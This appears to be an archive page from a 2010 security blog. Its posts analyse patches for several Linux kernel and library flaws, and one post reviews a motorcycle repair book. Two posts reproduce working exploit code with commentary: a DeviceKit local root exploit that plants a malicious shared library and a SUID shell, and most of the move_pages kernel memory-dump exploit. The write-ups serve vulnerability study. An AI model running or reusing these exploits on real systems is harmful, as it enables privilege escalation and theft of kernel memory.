CVE-2010-0746: DeviceKit Local Privilege Escalation

•April 6, 2010 • Leave a Comment

Vincent Danen of Red Hat reported an old bug on DeviceKit to the oss-security mailing list. A few hours later stealth wrote an exploit for this vulnerability to demonstrate the security implications as we can read from his twitter. The original bug report was sent by Pierre Ossman as a common bug where DeviceKit failed to mount discs with ‘/’ character in their filenames. To fix this design flaw, the following patch was applied to src/devkit-disks-device.c:

 	} else if (device->priv->id_uuid != NULL && strlen (device->priv->id_uuid) > 0) {
- 		mount_point = g_build_filename ("/media", device->priv->id_uuid, NULL);
+
+ 		GString *s;
+
+ 		s = g_string_new ("/media/");
+ 		for (n = 0; device->priv->id_uuid[n] != '\0'; n++) {
+ 			gint c = device->priv->id_uuid[n];
+ 			if (c == '/')
+ 				g_string_append_c (s, '_');
+ 			else
+ 				g_string_append_c (s, c);
+ 		}
+
+ 		mount_point = g_string_free (s, FALSE);
+
} 	else {

This was applied to the devkit_disks_device_filesystem_mount_authorized_cb() routine and as you can see instead of initializing ‘mount_point’ using g_build_filename() which concatenates strings “/media” and the device’s UUID, a new string “/media/” is initialized to ‘s’ using g_string_new() and each character of the UUID is checked against ‘/’ character. If a slash character is found it will be replaced with underscore and appended to the string that will later by used as the ‘mount_point’. In any other case, it will simply append the character and continue.
The security implications aren’t really easy to realize for most people but stealth wrote an exploit named ‘devshit.pl’ which is available here and demonstrates them by spawning a root shell. To achieve successful exploitation using this code read stealth’s comments in the beginning of the code. Here is a quick overview of his work…

sub usage
{
	print "Usage: $0 </dev/HDD-to-make-evil>\n";
	exit;
}

my $hdd = shift or usage();

Quite obvious, ‘$hdd’ is the argument which is a device file under /dev/ directory. If this is not set it will invoke usage(). Let’s move on…

system("mkfs.ext2 -L ../lib64/x86_64/ $hdd");
system("mkdir /M ||true;mount $hdd /M");
open(O,">/tmp/boomlib.c") or die $!;
print O<<EOF;

The filesystem of the given ‘$hdd’ is formatted to EXT2 and its volume label is set to ‘../lib64/x86_64/’ (read stealth’s comments to understand this) using the ‘-L’ option of mkfs.ext2. Next, a new directory named ‘M’ is created if it doesn’t exist and ‘$hdd’ is mounted to it. Finally, a new file descriptor for the /tmp/boomlib.c file is opened and the following code is appended to it:

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>

int volume_id_log_fn = 0;
void volume_id_get_type_version() { volume_id_log_fn = 1; exit(0); }
void volume_id_get_usage() { volume_id_get_type_version(); }
void volume_id_get_label_raw() { volume_id_get_usage(); }
void volume_id_get_label() { volume_id_get_label_raw(); }
void volume_id_all_probers() { volume_id_get_label(); }
void volume_id_encode_string() { volume_id_all_probers(); }
void volume_id_close() { volume_id_encode_string(); }
void volume_id_probe_filesystem() { volume_id_close(); }
void volume_id_probe_raid() { volume_id_probe_filesystem(); }
void volume_id_get_uuid_sub() { volume_id_probe_raid(); }
void volume_id_open_fd() { volume_id_get_uuid_sub(); }
void volume_id_get_type() { volume_id_open_fd(); }
void volume_id_get_uuid() { volume_id_get_type(); }
void volume_id_get_prober_by_type() { volume_id_get_uuid(); }
void volume_id_probe_all() { volume_id_get_prober_by_type(); }

As you can see these are a series of functions that end up calling the first one, volume_id_get_type_version() and are used simply to create a library to intercept them from HAL. The code continues like this:

void _init()
{
	int fd1, fd2, r;
	char buf[32000];
	fd1 = open("/lib64/x86_64/boomsh", O_RDONLY);
	fd2 = open("/var/tmp/boomsh", O_RDWR|O_CREAT, 0600);
	if (fd1 < 0 || fd2 < 0)
		return;
	r = read(fd1, buf, sizeof(buf));
	write(fd2, buf, r);
	close(fd1); close(fd2);

	chown("/var/tmp/boomsh",0,0);chmod("/var/tmp/boomsh", 04755);
	volume_id_probe_all();
}

This is the initialization function of the library which opens ‘/lib64/x86_64/boomsh’ and opens or creates ‘/var/tmp/boomsh’ and then simply copies the contents of ‘/lib64/x86_64/boomsh’ to the ‘/var/tmp/boomsh’ file and changing it to a root owned, SUID executable. At last, it will call volume_id_probe_all(). The aim of this library is to be invoked instead of the legit ‘libvolume_id’ since, as stealth noted, the dynamic linker looks at ‘/lib64/x86_64/’ under Fedora Core 11 x86_64 and so it could be abused.
Obviously, the Perl exploit moves on like that:

EOF
close(O);
system("cc -c -fPIC /tmp/boomlib.c -o /tmp/boomlib.o");
system("ld -shared -soname=libvolume_id.so.1 /tmp/boomlib.o -o /M/libvolume_id.so.1");
unlink("/tmp/boomlib.c"); unlink("/tmp/boomlib.o");

It compiles the previous C code as a shared library named ‘libvolume_id.so.1′. Next, a new file is created…

open(O,">/tmp/boomsh.c") or die $!;
print O<<EOF;

Where as you might imagine, ‘/tmp/boomsh.c’ is a SUID root code that spawns a Bash shell.

#include <stdio.h>
int main()
{
	char *a[]={"/bin/bash", "--noprofile", "--norc", NULL};
	setuid(0); setgid(0);
	execve(*a, a, NULL);
	return -1;
}

Finally, the Perl code ends like this:

EOF
close(O);
system("gcc -s -O2 /tmp/boomsh.c -o /M/boomsh");
unlink("/tmp/boomsh.c");
system("umount /M");

The attempt to unmount it will result in using the volume name ‘../lib64/x86_64/’ that will force DeviceKit in creating the evil library and the ‘boomsh’ binaries to that location even though this isn’t the actual volume’s location. When this library is invoked by the dynamic linker it will make ‘boomsh’ a SUID root shell at ‘/var/tmp/boomsh’.
Cool code! :)

CVE-2010-1187: Linux kernel TIPC NULL Pointer Dereference

•April 5, 2010 • Leave a Comment

This vulnerability was reported by Neil Horman and it affects Linux kernel 2.6.33 and probably other releases too. The problem appears in Transparent Inter-Process Communication (TIPC) code and specifically in the code below as seen at net/tipc/core.c file.

static int __init tipc_init(void)
{
      ...
        if ((res = tipc_core_start()))
                err("Unable to start in single node mode\n");
      ...
        return res;
}

This is the module’s initialization routine and as you can read it will invoke tipc_core_start() in order to start the module. This among others will execute the following…

/* global variables used by multiple sub-systems within TIPC */

int tipc_mode = TIPC_NOT_RUNNING;
      ...
/**
 * tipc_core_start - switch TIPC from NOT RUNNING to SINGLE NODE mode
 */

int tipc_core_start(void)
{
      ...
        get_random_bytes(&tipc_random, sizeof(tipc_random));
        tipc_mode = TIPC_NODE_MODE;
      ...
        return res;
}

So, after initializing ‘tipc_random’ with random bytes it will set ‘tipc_mode’ to ‘TIPC_NODE_MODE’ which means that communication is allowed only for its own address. This is done because the ‘tipc_net’ structure isn’t initialized yet and as we can find at net/tipc/net.c it’s set to NULL like this:

struct network tipc_net = { NULL };

So even though the user should not be able to send any messages to other address there is nothing to stop him from doing so. A user can simply create an ‘AF_TIPC’ socket and send a datagram before the kernel module for TIPC enters its network mode. If this happens, then the code shown below will be executed:

static int net_init(void)
{
        memset(&tipc_net, 0, sizeof(tipc_net));
        tipc_net.zones = kcalloc(tipc_max_zones + 1, sizeof(struct _zone *), GFP_ATOMIC);
        if (!tipc_net.zones) {
                return -ENOMEM;
        }
        return 0;
}

But since the ‘tpic_net’ pointer is still NULL this will lead to accessing ‘(NULL).zones’ offset which in turn results in a kernel OOPS because of the NULL pointer dereference. To fix this the global ‘tipc_net’ pointer was changed like this:

 DEFINE_RWLOCK(tipc_net_lock);
-struct network tipc_net = { NULL };
+struct _zone *tipc_zones[256] = { NULL, };
+struct network tipc_net = { tipc_zones };

This will make the previous pointer pointing to an array with the specified number of elements which are all of them initialized to 0/NULL so that ‘tipc_net’ is not pointing to NULL anymore. In addition to this, by doing this there is no need for initialization routines since the space is already allocated in the new static array. For this reason the net_init() was removed:

-static int net_init(void)
-{
-       memset(&tipc_net, 0, sizeof(tipc_net));
-       tipc_net.zones = kcalloc(tipc_max_zones + 1, sizeof(struct _zone *), GFP_ATOMIC);
-       if (!tipc_net.zones) {
-               return -ENOMEM;
-       }
-       return 0;
-}
-

And the equivalent net_stop() was changed to remove the NULL pointer check along with the kfree() calls like this:

 static void net_stop(void)
 {
        u32 z_num;

-       if (!tipc_net.zones)
-               return;
-
-       for (z_num = 1; z_num <= tipc_max_zones; z_num++) {
+       for (z_num = 1; z_num <= tipc_max_zones; z_num++)
                tipc_zone_delete(tipc_net.zones[z_num]);
-       }
-       kfree(tipc_net.zones);
-       tipc_net.zones = NULL;
 }

Finally, tipc_net_start() was also updated since there is no net_init() function in the module…


-       if ((res = tipc_bearer_init()) ||
-           (res = net_init()) ||
-           (res = tipc_cltr_init()) ||
+       if ((res = tipc_cltr_init()) ||
            (res = tipc_bclink_init())) {

Book: How To Repair and Maintain American V-Twin Motorcycles

•April 5, 2010 • Leave a Comment

So, since my hobbies include internal combustion engines and motorcycles I bought this book sometime ago. It’s a nice book covering all of the basics of repairing and maintaining V-Twin engines. It’s written by Sara Liberte who is running RT’s North Hills Cycle, Inc. with her boyfriend. I would suggest this book to people interested in choppers and V-Twin motorcycles in general although it doesn’t contain anything extremely advanced. Also, on the upside, the book is very well written and it contains numerous photos demonstrating the topics covered. Here is a more detailed review of each chapter separately.

Title: How To Repair and Maintain American V-Twin Motorcycles
Author: Sara Liberte

Chapter 1: Know Your Bike
The author here introduces the world of motorcycles based on personal stories and it continues with common stuff like riding gear, parts, service manuals, features of bikes, parts book etc. It’s just some introductory essential information that most riders already know. In any case, it is well written and the pictures are also a very good addition to make the chapter easier to read.

Chapter 2: Tool Time
In this chapter you can find information regarding the tools ranging from old-fashioned Phillips screwdrivers, Torx and Allen heads, ratchet wrenches etc. to more specialized ones such as torque wrenches, filter wrenches etc. The author also provides a simple description on the size values of each tool and personal suggestions. In addition, apart from the standard tools used in most cases, it includes some specialty tools for both mechanical and electrical problems that someone could face on a V-Twin motorcycle. At last, a discussion of safety measures as well as the importance of using the appropriate tools along with the service manual is being included.

Chapter 3: Drop That Fluid
This is the first chapter that includes seven projects that have to do with changing fluids in a motorcycle from simple ones such as changing oil and its equivalent filter to more advanced like upgrading the oil pump for performance gain. Everything discussed in the text is also shown in photos that demonstrate it step by step.

Chapter 4: Service Intervals
This is the largest chapter which includes twelve mechanical projects for numerous things from beginner to advanced levels. Once again everything is explained in both text and pictures. Here the projects range from simple ones like changing and reading spark plugs to more advanced such as upgrading the wheel’s rotor, caliper for performance etc.

Chapter 5: Electrical 101
As you can imagine, this chapter deals with the electrical system of a V-Twin American motorcycle. This includes batteries, charging system etc. Two more projects regarding these topics are included here too.

Chapter 6: Simple Roadside Repairs and Travel Toolkits
This is a tiny chapter that gives some hints for common road-side repairs that a rider might need to perform as well as some suggestions for the right toolkits for such situations.

Linux kernel UNIX Extensions CIFS NULL Pointer Dereference

•April 5, 2010 • Leave a Comment

A few days ago Eugene Teo repoerted a vulnerability in Linux kernel’s CIFS code to the linux-cifs-client mailing list. If we have a quick look at fs/cifs/dir.c of 2.6.32 release of the Linux kernel we can read the following.

/* Inode operations in similar order to how they appear in Linux file fs.h */

int
cifs_create(struct inode *inode, struct dentry *direntry, int mode,
                struct nameidata *nd)
      ...
        if (tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
            (CIFS_UNIX_POSIX_PATH_OPS_CAP &
                        le64_to_cpu(tcon->fsUnixInfo.Capability))) {
                rc = cifs_posix_open(full_path, &newinode, nd->path.mnt,
                                     mode, oflags, &oplock, &fileHandle, xid);
      ...
        return rc;
}

This routine is used to create an CIFS entry and the above code snippet is a check that will ensure ‘tcon->unix_ext’ (this is a Boolean flag for Linux extensions to CIFS protocol) isn’t NULL and then proceed to a capabilities check using session’s stored capabilities (through ‘tcon->ses->capabilities’) as well as the UNIX extension filesystem’s capability (using ‘tcon->fsUnixInfo.Capability’). At last, it will call cifs_posix_open() of fs/cifs/dir.c but as it was noted by Eugene Teo, the provided code in cifs_create() doesn’t perform any checks to ensure that the ‘nameidata’ pointer represented by ‘nd’ variable is a valid pointer. Because of this, if a file is created using UNIX extensions support and that file doesn’t provide any ‘nameidata’ pointer it will lead to ‘nd’ initialized to NULL and the call to cifs_posix_open() shown above will result in a NULL pointer dereference when it’ll attempt to access ‘nd->path.mnt’ to obtain the VFS mount information for that file. Here is how cifs_posix_open() uses the retrieved VFS mount structure (its 3rd argument):

int cifs_posix_open(char *full_path, struct inode **pinode,
                    struct vfsmount *mnt, int mode, int oflags,
                    __u32 *poplock, __u16 *pnetfid, int xid)
{
      ...
        struct cifs_sb_info *cifs_sb = CIFS_SB(mnt->mnt_sb);
      ...
        rc = CIFSPOSIXCreate(xid, cifs_sb->tcon, posix_flags, mode,
                        pnetfid, presp_data, poplock, full_path,
                        cifs_sb->local_nls, cifs_sb->mnt_cifs_flags &
                                        CIFS_MOUNT_MAP_SPECIAL_CHR);
      ...
        cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);

        /* get new inode and set it up */
        if (*pinode == NULL) {
                *pinode = cifs_iget(mnt->mnt_sb, &fattr);
      ...
        cifs_new_fileinfo(*pinode, *pnetfid, NULL, mnt, oflags);
      ...
        return rc;
}

Even though I haven’t tested anything yet I think that it could lead to exploitable conditions since it’s used by numerous functions that could be used to manipulate data from kernel space assuming that you can map the required pages to avoid the crash. Obviously, the vulnerability was patched simply like this:

 		oflags = FMODE_READ;

-	if (tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
+	if (nd && tcon->unix_ext && (tcon->ses->capabilities & CAP_UNIX) &&
 	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
 			le64_to_cpu(tcon->fsUnixInfo.Capability))) {

Libnids IP Fragmentation Remote NULL Pointer Dereference

•April 4, 2010 • 2 Comments

The designer of the popular library Rafal Wojtczuk (also known as nergal) discovered this vulnerability as we can read in the release notes of the 1.2.4 version of the library available here. As the release notes state, the vulnerability is located at src/ip_fragment.c and here is the equivalent code from 1.23 version of the library…

/*
  Memory limiting on fragments. Evictor trashes the oldest fragment
  queue until we are back under the low threshold.
*/
static void
ip_evictor(void)
{
  // fprintf(stderr, "ip_evict:numpack=%i\n", numpack);
  while (this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
    if (!this_host->ipqueue)
      panic("ip_evictor: memcount");
    ip_free(this_host->ipqueue);
  }
}

You can read from the comment the aim of this routine. The ‘while’ loop will iterate as long as integer ‘ip_frag_mem’ is larger than ‘IPFRAG_LOW_THRESH’ which is defined in the same source code file like this:

/*
  Fragment cache limits. We will commit 256K at one time. Should we
  cross that limit we will prune down to 192K. This should cope with
  even the most extreme cases without allowing an attacker to
  measurably harm machine performance.
*/
#define IPFRAG_HIGH_THRESH		(256*1024)
#define IPFRAG_LOW_THRESH		(192*1024)

Next, if the ‘this_host->ipqueue’ that describes an entry in the “incomplete datagrams” queue is NULL, it will immediately call panic(). Otherwise, it will invoke ip_free() on this queue entry. However, ‘this_host’ pointer which keeps the fragments for this host might be NULL and thus, each access to the ‘ip_frag_mem’ integer will lead to a NULL pointer dereference which could later result in exploitable situations at ip_free() function. This was patched like this:

   // fprintf(stderr, "ip_evict:numpack=%i\n", numpack);
-  while (this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
+  while (this_host && this_host->ip_frag_mem > IPFRAG_LOW_THRESH) {
     if (!this_host->ipqueue)

CVE-2010-0415: Linux kernel move_pages(2) Information Leak

•February 25, 2010 • Leave a Comment

So, this quite interesting vulnerability was discovered by Ramon de Carvalho Valle of IBM (aka. ramon of Rise Security) as we can read in this bug report by Eugene Teo of Red Hat. The bug affects Linux kernel prior to 2.6.33-rc7 and it is located in move_pages(2) system call’s code. This system call is used to move a number of memory pages to a different NUMA node, or to determine the nodes to which those pages are mapped as we can read in its man page. Now, let’s have a look at the vulnerability.
The code for this system call resides in mm/migrate.c and here is the equivalent code snippet from 2.6.32 release of the Linux kernel.

/*
 * Move a list of pages in the address space of the currently executing
 * process.
 */
SYSCALL_DEFINE6(move_pages, pid_t, pid, unsigned long, nr_pages,
                const void __user * __user *, pages,
                const int __user *, nodes,
                int __user *, status, int, flags)
{
        const struct cred *cred = current_cred(), *tcred;
        struct task_struct *task;
        struct mm_struct *mm;
        int err;
    ...
        if (nodes) {
                err = do_pages_move(mm, task, nr_pages, pages, nodes, status,
                                    flags);
        } else {
                err = do_pages_stat(mm, nr_pages, pages, status);
        }
    ...
}

So, ‘nodes’ is a user controlled pointer which will be used to determine what this system call will perform. Unless it’s set to zero it will call do_pages_move() as you can read in the provided code snippet. Let’s move to this routine now…

/*
 * Migrate an array of page address onto an array of nodes and fill
 * the corresponding array of status.
 */
static int do_pages_move(struct mm_struct *mm, struct task_struct *task,
                         unsigned long nr_pages,
                         const void __user * __user *pages,
                         const int __user *nodes,
                         int __user *status, int flags)
{
        struct page_to_node *pm;
        nodemask_t task_nodes;
        unsigned long chunk_nr_pages;
        unsigned long chunk_start;
        int err;
    ...
        /*
         * Store a chunk of page_to_node array in a page,
         * but keep the last one as a marker
         */
        chunk_nr_pages = (PAGE_SIZE / sizeof(struct page_to_node)) - 1;

        for (chunk_start = 0;
             chunk_start < nr_pages;
             chunk_start += chunk_nr_pages) {
    ...
                /* fill the chunk pm with addrs and nodes from user-space */
                for (j = 0; j < chunk_nr_pages; j++) {
                        const void __user *p;
                        int node;
    ...
                        if (get_user(node, nodes + j + chunk_start))
                                goto out_pm;

                        err = -ENODEV;
                        if (!node_state(node, N_HIGH_MEMORY))
                                goto out_pm;

                        err = -EACCES;
                        if (!node_isset(node, task_nodes))
                                goto out_pm;

                        pm[j].node = node;

                }

                /* End marker for this chunk */
                pm[chunk_nr_pages].node = MAX_NUMNODES;
    ...
                /* Return status information */
                for (j = 0; j < chunk_nr_pages; j++)
                        if (put_user(pm[j].status, status + j + chunk_start)) {
                                err = -EFAULT;
                                goto out_pm;
                        }
        }
        err = 0;

out_pm:
        free_page((unsigned long)pm);
out:
        return err;
}

In the above code you can read that the function will initially enter a ‘for’ loop for each chunk and then another one in order to fill the list of pages with the data derived from the user-space. It’s clear that it uses get_user() to obtain the node’s value directly from userspace and it’s using it later on without performing any range checks. The subsequent calls to node_state() and node_isset() will result in the execution of the code located at include/linux/nodemask.h:

extern nodemask_t node_states[NR_NODE_STATES];

#if MAX_NUMNODES > 1
static inline int node_state(int node, enum node_states state)
{
        return node_isset(node, node_states[state]);
}

and…

/* No static inline type checking - see Subtlety (1) above. */
#define node_isset(node, nodemask) test_bit((node), (nodemask).bits)

respectively, and as Eugene Teo noted in his comment:

(The node_isset and node_state functions just map to test_bit, which has no
limiter in the normal implementations.)

Thus the user could request any node value. This will lead to initializing the ‘pm[]‘ page’s node value with an arbitrary one which will later be returned to the userspace through put_user() in a ‘for’ loop as you can read in do_pages_move() routine’s code shown earlier. Obviously, this can result in information leak of kernel memory and it was fixed by applying the following patch:

                        err = -ENODEV;
+                       if (node < 0 || node >= MAX_NUMNODES)
+                               goto out_pm;
+
                        if (!node_state(node, N_HIGH_MEMORY))

Which checks that the signed integer ‘node’ is a positive number and doesn’t go beyond the constant ‘MAX_NUMNODES’ which is defined in include/linux/numa.h like this:

#ifdef CONFIG_NODES_SHIFT
#define NODES_SHIFT     CONFIG_NODES_SHIFT
#else
#define NODES_SHIFT     0
#endif

#define MAX_NUMNODES    (1 << NODES_SHIFT)

#endif /* _LINUX_NUMA_H */

At last, let’s move to the more interesting part of the post. The exploitation…
Brad Spengler of grsecurity (aka. spender) wrote and published an exploit code for this vulnerability which is named “exp_sieve.c” and it’s available for download here. He also provides some background information on the discovery of the vulnerability by ramon using his ‘flail’ fuzzer as well as some useful exploitation notes. So…

#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
      ...
struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

As you can see, he uses his exploitation framework (known as enlightenment) in this exploit too. If you’re not familiar with this framework you can just read the ‘exp_framework.h’ header file which has sufficient comments to outline the required functions and structures in order to use that API. For example, get_exploit_state_ptr() should be implemented in order to give access to the ‘exp_state’ structure as you can see above. Next, there are some helper functions…

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		fprintf(stdout, "Error: Unable to dump address %p\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

This function is used to store the address of the ‘nodes’ array for the given address. This will calculate and return the values that would later be used to leak data of the kernel. The next one is:

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, (int *)&nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			tmp |= (1 << i);
	}

	return tmp;
}

This is the actual “exploitation” function that will initialize the ‘nodes[]‘ array using the previous function for the provided address represented by ‘addr’ variable. Then, it calls the buggy system call passing the previously calculated ‘node’ values and it will also check the error number returned to determine if the system call is available in the system. If the system call returned without any ‘ENODEV’ (aka. “No Such Device”) error code, it will update the return value of the function.
The next routine is part of the enlightenment framework too and it’s the menu options of the exploit which is pretty simple as you can see here:

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

Even though the next routine in the exploit code is the trigger function, we’ll skip this in order to move to the preparation one first. Here is the pre-exploitation function…

int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

It uses the callback functions of the framework to retrieve some kernel symbols/addresses which in this case are the ‘totalhigh_pages’ which is part of ‘CONFIG_HIGHMEM’ option and it normally contains the total number of high pages, ‘node_states’ that contains the number of node states available and ‘node_online_map’ which contains the ‘N_ONLINE’ value (this one stands for “the node is online”).

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

After allocating 4KB using malloc(3), there's a neat trick to retrieve the size of the bitmap. What spender does is using node values from 0 to 511 and invoking move_pages(2). If the error code returned is 'ENODEV', it means that node_state() failed. If this is the case, then this would be the 'MAX_NUMNODES' value so it updates 'max_numnodes' with this value and breaks out of the loop.

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}

The final segment of this function will update the 'our_base' variable depending on the HIGHMEM configuration option. As the comment says, this is important since it'll be used to determine the size of each bitmap. Next, if the 'node_states' symbol is non-zero it will update 'our_base' based on the previously retrieved values and addresses to calculate the base address. Otherwise it will simply assume that the kernel isn't vulnerable. Finally, we have the trigger routine which starts like this:

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];

So, this is a simple argument parsing 'while' loop that reads the user input using fgets(3) unless it's '2' which stands for "Quit" as we can read in the menu() routine and then a common structure of 'switch-case' statements follows up..

		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';

In case the user requested the '0' option (which is the "Dump via symbol/address with length" option), it will read the symbol/address once again using fgets(3) and move on parsing it like this:

			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;

Using the framework's callback get_kernel_sym() it will attempt to retrieve the symbol. Next, it will request the number of bytes that the user wants to leak like this:

			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				fscanf(stdin, "%x", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;

Nothing really complicated to discuss here. Also, it updates the previously obtained symbol's address to point to the offset that the user set in this step. The following code will use a common loop structure to perform the information leak as you can see here:

			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;

this will iterate up to the calculated address and attempt to get a byte at each iteration using get_byte_at_addr() and immediately print it out. At last, it will enter a new line character and break of the loop.
If the user selected '1' option (which is "Dump entire range to file" in the exploit's menu), the following code path will be followed:

		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/*
			   our lower bound will cause us to access
			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif

After initializing the address it includes a compile-time pre-processor 'if' clause that will use the appropriate addresses for 64-bit or 32-bit x86 architectures and also, on 32-bit architectures it will check that the caclulated address remain in kernel space range. It'll continue like this:

			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

It sets the maximum value from the base address which translates to 256MB (0×10000000 in hex.) and opens up a file named "kernel.bin" for writing using fopen(3). Next…

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;

Iteratively, it will invoke get_byte_at_addr() for the whole 256MB range from base address and simply print it to the previously opened file descriptor. It also displays its progress to the user by printing some dots and when completed a "done." message. Then it will close the file and break the loop. At last, if the selection was '2' which stands for "Quit" it will just break the loop like this:

		case '2':
			break;
		}
	}

	return 0;
}

Finally, the post-exploitation function doesn't contain anything at all since this exploit leaves the kernel in a stable state that doesn't require any post-exploitation actions to take place.

int post(void)
{
	return 0;
}

You can also see this exploit code in action in a video that spender uploaded on youtube which is available here.

P.S.: There might be mistakes in this post since I wrote it really, really quick and didn’t pay the appropriate attention because I didn’t have the time to do so, sorry.

Update:
A couple of minutes after my post spender informed me about some mistakes that my post had. Thanks once again for this and since I don’t have much time, here are his comments in his own words. I’m just copying/pasting them:

Should have shown the definition of node_states, as it would explain why I bother trying to figure out the bitmap size and explains the calculation involving highmem detection; also the range is 512 (256 below the base, 256 above). The node_online_map lookup is for older kernel support; ENODEV means the tested bit was 1, EACCES means it was 0.

Linux kernel Alsa (hda-intel) Division by Zero Crash

•February 22, 2010 • Leave a Comment

This bug was discovered by Jody Bruchon who also provided a detailed bug report available in his site here. The susceptible code resides in sound/pci/hda/hda_intel.c and specifically in the function shown below.

static int bdl_pos_adj[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] = -1};
     ...
/*
 * Check whether the current DMA position is acceptable for updating
 * periods.  Returns non-zero if it's OK.
 *
 * Many HD-audio controllers appear pretty inaccurate about
 * the update-IRQ timing.  The IRQ is issued before actually the
 * data is processed.  So, we need to process it afterwords in a
 * workqueue.
 */
static int azx_position_ok(struct azx *chip, struct azx_dev *azx_dev)
{
        unsigned int pos;

        if (azx_dev->start_flag &&
            time_before_eq(jiffies, azx_dev->start_jiffies))
                return -1;      /* bogus (too early) interrupt */
        azx_dev->start_flag = 0;

        pos = azx_get_position(chip, azx_dev);
        if (chip->position_fix == POS_FIX_AUTO) {
                if (!pos) {
                        printk(KERN_WARNING
                               "hda-intel: Invalid position buffer, "
                               "using LPIB read method instead.\n");
                        chip->position_fix = POS_FIX_LPIB;
                        pos = azx_get_position(chip, azx_dev);
                } else
                        chip->position_fix = POS_FIX_POSBUF;
        }

        if (!bdl_pos_adj[chip->dev_index])
                return 1; /* no delayed ack */
        if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)
                return 0; /* NG - it's below the period boundary */
        return 1; /* OK, it's fine */
}

